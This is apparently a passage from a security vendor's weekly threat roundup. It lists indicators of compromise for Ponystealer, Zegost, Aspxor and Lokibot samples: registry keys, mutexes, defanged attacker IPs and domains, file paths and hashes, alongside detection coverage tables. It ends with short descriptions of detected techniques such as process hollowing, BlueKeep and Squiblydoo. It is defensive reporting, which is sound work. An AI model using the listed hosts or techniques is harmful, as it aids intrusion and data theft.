7ceb30d2e15f77281c7bac410782bdc07fb541a523757a498b65cd986e5aecda
7e2ce538386ef088f8295dab1e4d63702601ecece2ec6e62cbff0a34a3fba152
8bc740eb3c31ad14055c0401063b05cd679acbc9d398eb7d902032040396afae

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Malware.Ponystealer-9778326-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 12 samples
Registry KeysOccurrences
<HKCU>\Software\Microsoft\<random, matching '[A-Z][a-z]{3,11}'> 5
<HKCU>\SOFTWARE\WINRAR 1
<HKCU>\SOFTWARE\MICROSOFT\UTAHS
Value Name: Suzon
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Ekofdawok
1
<HKCU>\SOFTWARE\MICROSOFT\UTAHS
Value Name: Kafoxu
1
<HKCU>\SOFTWARE\MICROSOFT\UXIQ
Value Name: Yrysfi
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Potiitohl
1
<HKCU>\SOFTWARE\MICROSOFT\UXIQ
Value Name: Zehouh
1
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003E9
Value Name: F
1
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000001F5
Value Name: F
1
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003EC
Value Name: F
1
<HKCU>\SOFTWARE\WINRAR
Value Name: HWID
1
<HKU>\S-1-5-21-2580483871-590521980-3826313501-500 1
MutexesOccurrences
Local\35D8253BA10246EEC3E9D1EC1BDDD619 1
Global\578A424AC350219FF94B6557217F62A2 1
Local\AC1918A6507EF2FE5D98AA93E2A2778E 1
Global\DDC946F02322AF31B67B36A6FA248481 1
Local\A789F961596210A0B67B36A6FA248481 1
Global\03EC5FE8FD07B629B67B36A6FA248481 1
Global\18215B65E6CAB2A4B67B36A6FA248481 1
Global\3FC4E099C12F0958B67B36A6FA248481 1
Global\54535CFFAAB8B53EB67B36A6FA248481 1
Global\6AFD17129416FED304DC821D4883303A 1
Global\6AFD17129416FED30CDD821D4082303A 1
Global\6AFD17129416FED320DD821D6C82303A 1
Global\6AFD17129416FED324D8821D6887303A 1
Global\6AFD17129416FED324DE821D6881303A 1
Global\6AFD17129416FED334DD821D7882303A 1
Global\6AFD17129416FED338DF821D7480303A 1
Global\6AFD17129416FED36CDC821D2083303A 1
Global\6AFD17129416FED36CDF821D2080303A 1
Global\6AFD17129416FED37CDC821D3083303A 1
Global\6AFD17129416FED384D9821DC886303A 1
Global\6AFD17129416FED384DA821DC885303A 1
Global\6AFD17129416FED38CD9821DC086303A 1
Global\6AFD17129416FED390DC821DDC83303A 1
Global\6AFD17129416FED398DC821DD483303A 1
Global\6AFD17129416FED39CDC821DD083303A 1

*See JSON for more IOCs

IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
204[.]79[.]197[.]200 1
174[.]127[.]78[.]72 1
125[.]140[.]114[.]7 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
bountymarine[.]net 1
autocuga-mx[.]com 1
www[.]autocuga-mx[.]com 1
wonforhall[.]com 1
Files and or directories createdOccurrences
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.tmp 5
%TEMP%\LcwvlrrRdE.ini 1
%TEMP%\KKlfw2HNHy.ini 1
%TEMP%\8oEbk1juft.ini 1
%TEMP%\tmpdec106f9.bat 1
%APPDATA%\Afpiqyyr 1
%APPDATA%\Afpiqyyr\uhowcahyv.ysg 1
%APPDATA%\Noagraofgito 1
%APPDATA%\Noagraofgito\ewmyvaufoze.exe 1
%APPDATA%\Ogsaudqic 1
%APPDATA%\Ogsaudqic\ihgoatzyew.hen 1
%APPDATA%\Fenybaanydr 1
%APPDATA%\Fenybaanydr\giywhylogu.ohw 1
%APPDATA%\Sopyhuawx 1
%APPDATA%\Sopyhuawx\tykikeuql.exe 1
%APPDATA%\Zoqyvuxeka 1
%APPDATA%\Zoqyvuxeka\ocephadokea.ahv 1
%APPDATA%\Durowualdi 1
%APPDATA%\Durowualdi\uburimwi.loi 1
%APPDATA%\Dyfagyowq 1
%APPDATA%\Dyfagyowq\ygdairtiosi.exe 1
%APPDATA%\Siuzohiwgu 1
%APPDATA%\Siuzohiwgu\vyyvvauryc.qya 1
%TEMP%\tmp1db35bfa.bat 1
%APPDATA%\Awipnadaidi 1

*See JSON for more IOCs

File Hashes

050126f14e024840eafa639a0894ced4a7605e56eb412243dd0d17c88491fa6c
188542fa96069c79302a1c53b1c00ed8768b8a64c87a375dfa963072b4dbe761
1bbc165f8d7ab75d45c95e43e63b8c09d6515914fd03f76a80802937f866c5d5
2d3a5291d3668bcb9424c6363c677b148ef4268112da486f730fce09f5ae3c46
4ad5f3e296bd64e439d044eff0cd72ae951935ab641a0369c2ee0a498b02bd6f
66b46477dd5744f315d844280614027d04af1b5fb6777c46d4a6479307fdf3f4
8722d5820b103d6f2e8f856914789b1c7408c7afaf8dbd68c08e9896edec5405
97c28f5ed8212dc79f904bc6dcb65d34e8fb14f4361619873a2fd223ffcd7a04
a37f13674568dbbaae22b6ec946719399fb79ca8bc696cf90a4e36515dc12e16
a98c894a526286a4b4bdccd23a5ef79f027e3d001d9c438e806c3bedd5d98970
ad03fe98fd16efb84c188eae75b6190287dab4a24a1f35769ad2557730bafbec
b62fc770a37f971c2f7aae2a9d6b3a0c16c7ff1f3adaeabe89e6dc294c3a4654

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

ThreatGrid


MITRE ATT&CK


Win.Trojan.Zegost-9778522-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 12 samples
Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: svñhîst
12
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
172[.]217[.]9[.]238 12
172[.]217[.]197[.]113 1
172[.]217[.]197[.]100 1
172[.]217[.]197[.]139 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
srawslorpower[.]com 12

File Hashes

20f9f515fcc11d8d445dbc1751b8e8456783a5dbf0eb054b45aad118ad676d86
2e658788eda55427417e9b1a012f8d38f3b9f620138149b83abbe141f01734f5
38516be404fc5f6648bbccf3268499712b15ac2834d5ea99b7e8f60fff7d0ac3
3b8751772ba388f56c4acd0a86c3a61d096963ff020fffb5e61f5ff0d774e14a
62a9068c70f7cb60fd38036079ccf626b9b1478be28345810bb792cd61cc538b
78390087229eea1c6b0b462afa74218ad54be8a2674db205ef69c74edd91eb5d
8e8799b3077a4711df2a3a958ba26e2b2b0849d6bcb564a71684c2638350319b
bb3a86ded831499ac5dd341ec891701cc0983fe64a59081e9e256a61163ca6f0
c5345eb480c780fbed405b7d225ffcadb768d2f666f4700ee19c9011d0f12a5c
d10844c9d92893cce18562e87d545fc8c3aeb6b17979b28380c221ca250605c5
e4c00f513c870a4a52eeaaf83532cd738f756b392fe28295320499b4ac8243ed
f8bfd92ee55f55de50b8616beb5690da85a8d3b16ebc2ee683944bcad5f2b17d

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

ThreatGrid


MITRE ATT&CK


Win.Worm.Aspxor-9778626-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 260 samples
MutexesOccurrences
2GVWNQJz1 260
Djjwy&22bsqobnaHhdGwemvt(&11839) 260
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
222[.]124[.]166[.]12 163
209[.]170[.]120[.]163 163
46[.]55[.]222[.]24 160
93[.]186[.]181[.]62 159
217[.]115[.]50[.]228 156
82[.]116[.]211[.]16 155
186[.]115[.]122[.]67 155
194[.]85[.]183[.]2 153
172[.]217[.]197[.]101 1
172[.]217[.]197[.]139 1
172[.]217[.]197[.]84 1
173[.]194[.]206[.]94 1
74[.]125[.]155[.]201 1
173[.]194[.]184[.]43 1
Files and or directories createdOccurrences
%LOCALAPPDATA%\<random, matching '[a-z]{8}'>.exe 260
%HOMEPATH%\Local Settings\Application Data\ptdxnxxl.exe 1

File Hashes

02f64d25c1580ba78e6fa8c383624f0e013fded13b0270eea5b19289a0139578
04f22e454b8c0513fe128ff6fc8e1f47a4ab94bfdf2e99d4569f3bf9a23c9173
050f72354d23146cee3292124488dad9b353c4bba763f4b6833e12c316edbb7f
059f5cea45f0a3abdfd2fce4bec7f585ca6005d7191ef2e8b6987188940951aa
06023d6436712615722f2f0b22f33fa2225de04657b1da7778677e8e43f6502a
06ee84631e2023ab4c6b8c526465dec6787afbda023616eefdd7ec629797094f
07abd29f43412c8429289a7f10e64c7c4442ef3ef4d89437a7ad375d2083d3ab
07d3b2ac65941e96a6204081879d765d8ca4440133e2233fd6ef1c1f79245ae2
08319bcf3ddbe2506cd04dd1199f4cb27ecd0abe03947a4a185b5d825d99980b
0a61db38db8e1039dda95b072812b15ef7fb63c4666337529f0eb763a03d6ed6
0aa51018dbf43ab07477c5cd1a3e526fd37d2f27a0691b86440ba6bf4a2cb129
0c5274e9e9f4f8bf10444d637de28293c5737534baf82f15e064571fade3c8e1
0d7b107a54c1e03899de667102b1da7c6f2a27b8f5add13c48586ddb8758df0d
0ddc55ab67d64bd31ddbc935b9ee8773b70c7f8a3d499948621b22e4c590a56c
0de8a5c5897475c73187a789edb74670e64092985c673cdd2369871023da90cb
0df529097c03f46d2c200c7a06e9f0358c41a3ca7f1d9b893fd6646ccdcb7e1f
0eae1f1d65ed95073547c50f94fe7ca44c7a0d2e81b1b02a77dcf394a8f41276
0f6edeca6c82b6164c98d3da76a27bcca24059bf3fe6a76ac474b43b71e1e165
10a17284afe88ea1903eccdeccb517de70a5d1757925623a9ee0414b35f15b6a
11195cdd234075d4a4addae581393805909796fc032b78316e18d18fbae941e6
115f6c582609733ab9fc143bb9182bf0f3015407a269fda5d71ff019205fd2c3
123395b127ee5c4b5561d596f4f4615067358c6a13314a911a6cb51428f042e7
14ea8070cc476985510b4010eab52f83ee860b34a0ee0be5377d67cd000df8fc
164c19756de93c5770ba2a8ad5b92fc513b1605859a93131451c92ab4faf96a7
16614eb1b8702cc4450115b76777afc099fc710d737eab76a50fd09a4943b370

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


MITRE ATT&CK


Win.Packed.Lokibot-9778864-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: newapp
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: nwama
1
MutexesOccurrences
3749282D282E1E80C56CAE5A 5
9DAA44F7C7955D46445DC99B 5
A16467FA-7343A2EC-6F235135-4B9A74AC-F1DC8406A 3
Global\fd3820c1-0745-11eb-887e-00501e3ae7b6 1
A2CF1074-2C1AFDB0-AF235135-4A69628B-BADA1D134 1
A2CF10742-C1AFDB0A-F2351354-673F0738-6A4AEFB0 1
A2CF1074-2C1AFDB0-AF235135-4516CC7A-45878301E 1
A2CF1074-2C1AFDB0-AF235135-448865A5-C4F91E2D6 1
A2CF1074-2C1AFDB0-AF235135-4407E0A3-F4F8912B9 1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
204[.]79[.]197[.]200 3
195[.]69[.]140[.]147 3
72[.]21[.]81[.]240 1
43[.]254[.]17[.]15 1
54[.]235[.]182[.]194 1
23[.]21[.]126[.]66 1
8[.]249[.]245[.]254 1
136[.]144[.]237[.]217 1
23[.]21[.]252[.]4 1
207[.]154[.]254[.]218 1
103[.]253[.]212[.]224 1
82[.]165[.]248[.]254 1
212[.]54[.]132[.]65 1
207[.]154[.]240[.]23 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
elb097307-934924932[.]us-east-1[.]elb[.]amazonaws[.]com 2
api[.]ipify[.]org 2
ctldl[.]windowsupdate[.]com 2
cpanel[.]com 1
cs11[.]wpc[.]v0cdn[.]net 1
auto[.]au[.]download[.]windowsupdate[.]com[.]c[.]footprint[.]net 1
alifmedical[.]shop 1
smithandwollensky[.]com[.]tw 1
Files and or directories createdOccurrences
%APPDATA%\D282E1 5
%APPDATA%\D282E1\1E80C5.lck 5
%APPDATA%\7C7955\5D4644.lck 5
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\sales.vbs 2
%TEMP%\<random, matching '[a-z]{3}[A-F0-9]{3,4}'>.tmp 2
%APPDATA%\newapp\newapp.exe 1
%TEMP%\nwama\nwama.exe 1
%TEMP%\40B9E22A\api-ms-win-core-namedpipe-l1-1-0.dll 1
%TEMP%\40B9E22A\api-ms-win-core-processenvironment-l1-1-0.dll 1
%TEMP%\40B9E22A\api-ms-win-core-processthreads-l1-1-0.dll 1
%TEMP%\40B9E22A\api-ms-win-core-processthreads-l1-1-1.dll 1
%TEMP%\40B9E22A\api-ms-win-core-profile-l1-1-0.dll 1
%TEMP%\40B9E22A\api-ms-win-core-rtlsupport-l1-1-0.dll 1
%TEMP%\40B9E22A\api-ms-win-core-string-l1-1-0.dll 1
%TEMP%\40B9E22A\api-ms-win-core-synch-l1-1-0.dll 1
%TEMP%\40B9E22A\api-ms-win-core-synch-l1-2-0.dll 1
%TEMP%\40B9E22A\api-ms-win-core-sysinfo-l1-1-0.dll 1
%TEMP%\40B9E22A\api-ms-win-core-timezone-l1-1-0.dll 1
%TEMP%\40B9E22A\api-ms-win-core-util-l1-1-0.dll 1
%TEMP%\40B9E22A\api-ms-win-crt-conio-l1-1-0.dll 1
%TEMP%\40B9E22A\api-ms-win-crt-convert-l1-1-0.dll 1
%TEMP%\40B9E22A\api-ms-win-crt-environment-l1-1-0.dll 1
%TEMP%\40B9E22A\api-ms-win-crt-filesystem-l1-1-0.dll 1
%TEMP%\40B9E22A\api-ms-win-crt-heap-l1-1-0.dll 1
%TEMP%\40B9E22A\api-ms-win-crt-locale-l1-1-0.dll 1

*See JSON for more IOCs

File Hashes

1421c6449272c878575bd19a79da02a2c77d88087a9d941347d6a034d525c618
25acf02cc393c4e9dddf804b381cb044c18fa3d7ca154344da16327911a67126
27fafaa183f0e146f109d76b242bf4b24e94d275065c39894fb03edb4740e7aa
2b8f65f89e42df43d2e03ab9266fc70a3c59db4431860022db31750cedf3b137
3802412e4c6cc2f1d28e0e0769752644b5bc8331e5db8552c810de47dfabaa46
392a4825788bb0997853f9aa71182753cebb63be526fff676a4a8e45b5f74e65
3d342000beac55de98a1c8ad1303df74bdc85663826a36cca0bc2839cb2de78a
3f592dc29d3addd13fd486b1c479af1a2ece77f5030ef95be6678ecdcd2b3af2
4c0c8db1deeeea5ed6143eb42c5ea729c8dbe82179a05a0a00a3f486837f80ff
501fcd229429dd2dc0e3214687fd8954c1000dcd761bc9a83f13fb68e71c8643
5386098cc12ae5b0ddf4bbadd1af2a28273388ab28596a120753bcd180ee62c3
5868b48651fa1b0c66330aa68e0a96e0e8cec2c6873eb7b0cf77d01310c28aaa
6772541377602657129984363cdadc504060855dba527d0d864853402ff1e03d
78b30213721b0e76e269982384847c7269cff3f4e58f15494f7029faebebe79f
834ef88e9aff3dd68e67981ba7d7d9e1c193ede60369389cb9efe30d17fbc754
86c5a12f5cddeae76e2470df64352f82db1b8ec24dc58a94371d80a7a5ba3889
a8e5d8ac33ac66ede6bc9940301d9cdb169ed44e9824d5c49a03e1e221c4ed60
a962fa9fd975082df8299fca3b5d6eb71c17992364992e1338fb8eaf1715d98b
a98127f9a0d540a5aa091013a1134d8a8434e50b7f8e8b959ddaac0f45feac04
af78e9a2d4a82521ad67cc63493b8525ebf8c2c1b1fb2530162250daafeb2ec7
b89a088920730eab022b1ce9c6568eee27e4595206ffc1f823786a1e97f485a2
bd29c57a40754d96d4ac76960b2e04d0bd243b33f12bd0ca11e2bf8c7d7197b0
c0840f82e323c7b7d7150b465027bd75b57c6fbd96a134a9d63a5b3b177d3e3a
c81ed1b94ac3d89b7152ac551383c19535d723c1b7551051236076497b74faba
e27846749619df94dd373cbbc3a27fe44a5790bac920ad7c2d8ed13296e71387

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.

Fareit trojan has been detected - (16334)
Behavior assocaited with Fareit has been detected. Fareit is an information stealing trojan that can send sensitive data back to an attacker from the victim machine.
Process hollowing detected - (5058)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
Dealply adware detected - (2771)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
CVE-2019-0708 detected - (481)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
Installcore adware detected - (453)
Install core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.
Gamarue malware detected - (251)
Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
Excessively long PowerShell command detected - (227)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
Crystalbit-Apple DLL double hijack detected - (223)
Crystalbit-Apple DLL double hijack was detected. During this attack, the adversary abuses two legitimate vendor applications, such as CrystalBit and Apple, as part of a dll double hijack attack chain that starts with a fraudulent software bundle and eventually leads to a persistent miner and in some cases spyware deployment.
Squiblydoo application whitelist bypass attempt detected. - (183)
An attempt to bypass application whitelisting via the "Squiblydoo" technique has been detected. This typically involves using regsvr32.exe to execute script content hosted on an attacker controlled server.
Bluestacks adware detected - (96)
Bluestacks adware displays unwanted advertising in the form of popups or by injecting into browsers and altering advertisements on webpages. Adware has also been known to download and install malware.